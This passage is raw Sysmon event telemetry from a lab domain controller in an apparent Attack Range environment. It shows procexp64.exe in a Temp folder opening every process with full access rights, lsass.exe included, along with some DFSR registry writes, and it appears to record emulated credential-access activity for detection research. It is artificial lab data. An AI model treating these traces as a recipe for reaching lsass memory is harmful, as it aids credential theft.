15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788088Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788087Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788086Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788085Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788084Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788083Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788082Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788081Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788080Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788079Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788078Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788077Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788076Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788075Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788074Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788073Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788072Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:16.861{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000788053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-SetValue2021-01-26 15:16:16.111{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\0C308890-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_0C308890-0000-0000-0000-100000000000.XML 13241300x8000000000000000788052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-SetValue2021-01-26 15:16:16.095{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0D7B2F29-B058-428A-BAFD-183346228A31\Config SourceDWORD (0x00000001) 13241300x8000000000000000788051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-SetValue2021-01-26 15:16:16.095{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0D7B2F29-B058-428A-BAFD-183346228A31\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_0D7B2F29-B058-428A-BAFD-183346228A31.XML 10341000x8000000000000000788177Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 